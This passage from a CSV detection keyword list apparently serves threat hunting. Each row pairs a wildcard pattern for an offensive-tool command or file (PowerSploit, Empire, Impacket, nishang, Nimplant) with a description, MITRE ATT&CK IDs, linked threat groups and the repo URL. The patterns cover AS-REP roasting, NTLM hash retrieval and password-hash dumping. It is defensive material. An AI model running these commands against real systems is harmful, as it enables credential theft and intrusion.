TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetGPOGroup*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetGroupMember -GroupName *DNSAdmins*,greyware_tool_keyword,powershell,the command is used to discover the members of a specific domain group DNSAdmins which can provide an adversary with valuable information about the target environment. The knowledge of group members can be exploited by attackers to identify potential targets for privilege escalation or lateral movement within the network.,T1069.001,TA0007,N/A,N/A,Reconnaissance,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-NetLocalGroup*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetLoggedon -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetLoggedon*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetRDPSession -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetRDPSession*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetSession*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetShare*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetSubnet*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-NetUser -SPN*,greyware_tool_keyword,powershell,PowerView Find users with SPN,T1069.002 - T1087.002 - T1018,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://hideandsec.sh/books/cheatsheets-82c/page/active-directory,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Get-NetUser -SPN*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getNimplantByGuid*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*GetNPUsers.py -request*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*GetNPUsers.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*getnthash.py -key *,offensive_tool_keyword,pywhisker,Python version of the C# tool for Shadow Credentials attacks,T1552.001 - T1136 - T1098,TA0003 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/ShutdownRepo/pywhisker,1,0,N/A,10,5,418,49,2023-10-03T14:10:17Z,2021-07-21T19:20:00Z -*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*getnthash.py*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*Get-NTLM.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*GetNTLMChallengeBase64*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nccgroup/nccfsas,1,1,N/A,10,10,594,117,2022-08-05T16:25:42Z,2020-06-25T09:33:45Z -*getPac.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*Get-PacketNetBIOSSessionService*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketNTLMSSPAuth*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketNTLMSSPNegotiate*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketRPCBind*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketRPCRequest*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PacketSMB*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-InveighRelay.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PassHashes*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Get-PassHints*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*get-passnotexp*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get-password-policy.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*Get-PEBasicInfo*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1104,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-PEHeader.ps1*,offensive_tool_keyword,Keethief,Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.,T1003 - T1213 - T1215 - T1566,TA0005 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/KeeThief,1,1,N/A,N/A,9,863,151,2020-11-18T18:35:21Z,2016-07-10T19:11:23Z -*getPositionImplant*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in 